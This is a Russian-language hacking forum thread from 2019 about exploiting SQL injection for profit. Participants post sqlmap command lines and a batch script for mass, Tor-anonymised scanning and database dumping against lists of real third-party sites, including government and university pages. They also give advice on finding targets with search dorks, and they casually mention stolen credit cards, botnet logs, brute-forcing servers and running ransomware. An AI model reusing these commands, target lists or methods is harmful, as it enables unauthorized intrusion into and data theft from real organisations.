SQLi и с чем его едят (2019)

[BabaDook]

Хорошая тема. Как в нее войти с минимальным багажом знаний?

чем тебе с дедиками не тема?

 

[Eject]

Хорошая тема. Как в нее войти с минимальным багажом знаний?

На экспе был более свежий кейс, там суть была в поиске возможной sql инъекции Netsparker'ом и докручивание скули и дамп sqlmap'ом.
Если без кодинга в полне норм вариант, всё это крутилось на сервачках, автор писал даже что CC доставал.

 

[Guron_18]

ну я не юзаю маздаевское гавнецо!!!

с таким гавнецом я рабоать не буду даже

гораздо лучше вашего маздаевского гавна, где детекты 98% с чем вашим гавном 68%

говорю же гавно твой дампер!

тока регнулся -5 репа, да ладно, знаю то что я прав, а виндосовские утилитки шлак

Сори не выдержал. Необоснованная речь дурачка. Как ты можешь говорить про то, что не юзал? В каждом софте свои вектора. Если один софт не раскрутит то второй может крутануть за секунды. Взять тот же SQLmap коорый может не взять, то, что возьмет древнейший havij причем намного быстрее.

Может вы не вкурсе, но абсолютно все python и perl скрипты идут на win.

P.s. По теме ничего нового. Тема скулей не раскрыта вообще никак.

 

[Kevin Shindel]

чем тебе с дедиками не тема?

Не совсем понял причем тут дедики к базам? Бро я не уловил тонкую нить.

 

[BabaDook]

Не совсем понял причем тут дедики к базам? Бро я не уловил тонкую нить.

Ты вроде дедиками занимался, А тут Слив БД, совсем друге. Не лучше осилить одну тему, но хорошо.
К тому же нужна в дедиках была и будет всегда, актуальность не упадёт.

 

[BabaDook]

Можно как-то так сделать

sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --timeout=1 --skip-static --technique=UET --threads=3 --retries=1 -m url.txt

url.txt

Спойлер

http://www.ventrilo.com/dlprod.php?id=1
https://zoom.us/postattendee?id=1
http://my.earthlink.net/start/?id=1
https://home.careerstep.com/?id=1
https://library.cps.edu/index.php?loc_id=1
http://www.ctlottery.org/Modules/Games/default.aspx?id=1
https://cararuns.org/cs/cara/page.detail?page_id=1
https://fortress.wa.gov/ecy/enviwa/StationInfo.aspx?ST_ID=1
https://www.dsc.com/?n=library&o=view_documents&id=1
http://stats.statbroadcast.com/statmonitr/?id=1
https://account.lunarpages.com/login.php?s_id=1
http://www.legalassist.org/?id=1
http://media.krone-northamerica.com/index.php?id=1&L=1
https://www.egscomics.com/index.php?id=1
https://www.xmlvalidation.com/?id=1&L=0
https://wall.alphacoders.com/by_category.php?id=3
http://killerbunnies.com/?page_id=3
https://www.cruisecritic.com/articles.cfm?ID=3
https://www.roberts.edu/clc?id=3
https://www.eeoc.gov/?page_id=3
https://ca.countingopinions.com/index.php?page_id=3
https://amhistory.si.edu/militaryhistory/printable/section.asp?id=3
http://pima.granicus.com/ViewPublisher.php?view_id=3
https://www.usmle.org/contact/?id=3
http://www.airmar.com/productdescription.html?id=3
https://kb.wisc.edu/page.php?id=3
http://ncdp.crlctraining.org/catalog/?id=3
https://www.arconic.com/global/en/products/browse.asp?bus_id=3
http://sourkrautsmodeltrucks.com/?page_id=3
http://calleam.com/WTPF/?page_id=3
https://friendsofscience.org/index.php?id=3
http://cit.memphis.edu/curriculuma.php?id=3&page=2
https://support.wdc.com/cat_products.aspx?ID=3&lang=en&i

Если надо тестануть сайты на наличие , то
sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --timeout=1 --skip-static --technique=UET --threads=3 --retries=1 --crawl=2 --form -m url2.txt

Спойлер

https://rtionline.gov.in/request/status.php
https://www.valdosta.edu/academics/graduate-school/application-status-check.php

Это конечно не самые быстрые варианты, хз как сделать что бы он быстрее работал. Я пока не придумал

 

[Kevin Shindel]

Ты вроде дедиками занимался, А тут Слив БД, совсем друге. Не лучше осилить одну тему, но хорошо.
К тому же нужна в дедиках была и будет всегда, актуальность не упадёт.

Я добился необходимого мне минимума, дальше не вижу смысла углубляться да и не место тут про это говорить. Тут вроде про скули разговор. Давай поддерживать тему ТС и уважать его и его труд.

 

[Eject]

Можно как-то так сделать

url.txt

Спойлер

http://www.ventrilo.com/dlprod.php?id=1
https://zoom.us/postattendee?id=1
http://my.earthlink.net/start/?id=1
https://home.careerstep.com/?id=1
https://library.cps.edu/index.php?loc_id=1
http://www.ctlottery.org/Modules/Games/default.aspx?id=1
https://cararuns.org/cs/cara/page.detail?page_id=1
https://fortress.wa.gov/ecy/enviwa/StationInfo.aspx?ST_ID=1
https://www.dsc.com/?n=library&o=view_documents&id=1
http://stats.statbroadcast.com/statmonitr/?id=1
https://account.lunarpages.com/login.php?s_id=1
http://www.legalassist.org/?id=1
http://media.krone-northamerica.com/index.php?id=1&L=1
https://www.egscomics.com/index.php?id=1
https://www.xmlvalidation.com/?id=1&L=0
https://wall.alphacoders.com/by_category.php?id=3
http://killerbunnies.com/?page_id=3
https://www.cruisecritic.com/articles.cfm?ID=3
https://www.roberts.edu/clc?id=3
https://www.eeoc.gov/?page_id=3
https://ca.countingopinions.com/index.php?page_id=3
https://amhistory.si.edu/militaryhistory/printable/section.asp?id=3
http://pima.granicus.com/ViewPublisher.php?view_id=3
https://www.usmle.org/contact/?id=3
http://www.airmar.com/productdescription.html?id=3
https://kb.wisc.edu/page.php?id=3
http://ncdp.crlctraining.org/catalog/?id=3
https://www.arconic.com/global/en/products/browse.asp?bus_id=3
http://sourkrautsmodeltrucks.com/?page_id=3
http://calleam.com/WTPF/?page_id=3
https://friendsofscience.org/index.php?id=3
http://cit.memphis.edu/curriculuma.php?id=3&page=2
https://support.wdc.com/cat_products.aspx?ID=3&lang=en&i

Мой Scanner_Lite.bat выглядит вот так:

@echo off

set /p inFile="File: "

python "%~dp0\sqlmap\sqlmap.py" -m "%inFile%" --random-agent --threads 50 --crawl=1 --risk=3 --level=5 --keep-alive --batch --tor --tor-port=9050 --tor-type=SOCKS5 --time-sec=10 --timeout=15 --dbms=MySQL --dbs --tables --technique=EUS --no-cast --no-escape --output-dir "%~dp0\Dumps" -s "%~dp0\Dumps\scan_report.txt" --fresh-queries "%~dp0\Dumps\scan_out.txt"

 

[Kevin Shindel]

Можно как-то так сделать

url.txt

Спойлер

http://www.ventrilo.com/dlprod.php?id=1
https://zoom.us/postattendee?id=1
http://my.earthlink.net/start/?id=1
https://home.careerstep.com/?id=1
https://library.cps.edu/index.php?loc_id=1
http://www.ctlottery.org/Modules/Games/default.aspx?id=1
https://cararuns.org/cs/cara/page.detail?page_id=1
https://fortress.wa.gov/ecy/enviwa/StationInfo.aspx?ST_ID=1
https://www.dsc.com/?n=library&o=view_documents&id=1
http://stats.statbroadcast.com/statmonitr/?id=1
https://account.lunarpages.com/login.php?s_id=1
http://www.legalassist.org/?id=1
http://media.krone-northamerica.com/index.php?id=1&L=1
https://www.egscomics.com/index.php?id=1
https://www.xmlvalidation.com/?id=1&L=0
https://wall.alphacoders.com/by_category.php?id=3
http://killerbunnies.com/?page_id=3
https://www.cruisecritic.com/articles.cfm?ID=3
https://www.roberts.edu/clc?id=3
https://www.eeoc.gov/?page_id=3
https://ca.countingopinions.com/index.php?page_id=3
https://amhistory.si.edu/militaryhistory/printable/section.asp?id=3
http://pima.granicus.com/ViewPublisher.php?view_id=3
https://www.usmle.org/contact/?id=3
http://www.airmar.com/productdescription.html?id=3
https://kb.wisc.edu/page.php?id=3
http://ncdp.crlctraining.org/catalog/?id=3
https://www.arconic.com/global/en/products/browse.asp?bus_id=3
http://sourkrautsmodeltrucks.com/?page_id=3
http://calleam.com/WTPF/?page_id=3
https://friendsofscience.org/index.php?id=3
http://cit.memphis.edu/curriculuma.php?id=3&page=2
https://support.wdc.com/cat_products.aspx?ID=3&lang=en&i

Если надо тестануть сайты на наличие , то
sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --timeout=1 --skip-static --technique=UET --threads=3 --retries=1 --crawl=2 --form -m url2.txt

Спойлер

https://rtionline.gov.in/request/status.php
https://www.valdosta.edu/academics/graduate-school/application-status-check.php

Это круто, только откуда взять список урлов?

 

[BabaDook]

Мой Scanner_Lite.bat выглядит вот так:

@echo off

set /p inFile="File: "

python "%~dp0\sqlmap\sqlmap.py" -m "%inFile%" --random-agent --threads 50 --crawl=1 --risk=3 --level=5 --keep-alive --batch --tor --tor-port=9050 --tor-type=SOCKS5 --time-sec=10 --timeout=15 --dbms=MySQL --dbs --tables --technique=EUS --no-cast --no-escape --output-dir "%~dp0\Dumps" -s "%~dp0\Dumps\scan_report.txt" --fresh-queries "%~dp0\Dumps\scan_out.txt"

ошибки есть, но в целом да, такое тоже имеет право на жизнь.

 

[BabaDook]

Это круто, только откуда взять список урлов?

Вот, тут самое сложное. Хз кто как делает, а я просто пишу в поисковик

Бабы,шлюхи,продажи, твари.
или *.gov.ru\com\by итд.
Вообщем нужен софт, у меня его нету.

 

[Eject]

ошибки есть, но в целом да, такое тоже имеет право на жизнь.

Говори, я весь в внимании!)

еще такой есть, тоже дико удобный скрипт:

@echo off
tasklist /fi "imagename eq tor.exe" /nh |find /i /c "tor.exe"|findstr "^1$" >nul && taskkill /f /im tor.exe
start "" "C:\Tor Browser\Browser\TorBrowser\Tor\tor.exe" sockslistenaddress localhost socksport 9050 controlport 9051
exit

 

[Kevin Shindel]

Софт то можно написать, знать бы параметры для чека... Вот в чем вопрос.

 

[amstrot]

Есть ещё такой вариант SqlMap GUI для windows, тема старая, но при желании sqlmap можно обновить тыц Однозначно SqlMap заслуживает большего уважения...

 

[BabaDook]

Говори, я весь в внимании!)

еще такой есть, тоже дико удобный скрипт:

@echo off
tasklist /fi "imagename eq tor.exe" /nh |find /i /c "tor.exe"|findstr "^1$" >nul && taskkill /f /im tor.exe
start "" "C:\Users\User\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe" sockslistenaddress localhost socksport 9050 controlport 9051
exit

Ну, я не видел список урлов ещё. threads максимальн 10, потом у тебя как бд только одна указанна, а ещё ещё как минимум 2.Вообщем есть куда доработать. Но универсальног не будет. Увы

 

[BabaDook]

Софт то можно написать, знать бы параметры для чека... Вот в чем вопрос.

хз, я давно ниче не ломаю, не приносит ни денег, не удовольствия, тут я не подскажу, иной раз быстрее руками что-то раскрутить чем софтом. Но вроде как,Ничего не меняется с годами, берут докри разные, под шопы, крипты, битки итд, и парсят, дальше вгоняют в софт, дальше анализируют вывод. Легче тем у кого ботсеть, они логи глядят только, там уже все учётки с доступаи есть.

 

[Kevin Shindel]

Как то все расплывчато , дорки, ботнеты... Может почитать чего?

 

[BabaDook]

Как то все расплывчато , дорки, ботнеты... Может почитать чего?

Я сам не особо. Это типа криминал, а я оч люблю свободу. Если есть интерес могу в пм чё-та написать,но я сам не особо в этой теме. Я больше прибыли в дедиках вижу. типа набрутил дедиков что бы брутить дедики, и так по кругу, вечный пизнес. Потом шифровщика запустил и ловишь профит, как с МОНГБД

 

[Eject]

Ну, я не видел список урлов ещё. threads максимальн 10, потом у тебя как бд только одна указанна, а ещё ещё как минимум 2.Вообщем есть куда доработать. Но универсальног не будет. Увы

Чтобы поменять максимальное кол-во потоков, нужно поправить параметр MAX_NUMBER_OF_THREADS в файлике SQLMap\lib\core\settings.py
Список урлов - просто сайтики, там же стоит --crawl=1, он сам вытянет линки.

 

[BabaDook]

Чтобы поменять максимальное кол-во потоков, нужно поправить параметр MAX_NUMBER_OF_THREADS в файлике SQLMap\lib\core\settings.py
Список урлов - просто сайтики, там же стоит --crawl=1, он сам вытянет линки.

ну кстати да, я чё-та не сразу подумал об кастомном апдейте sqlmap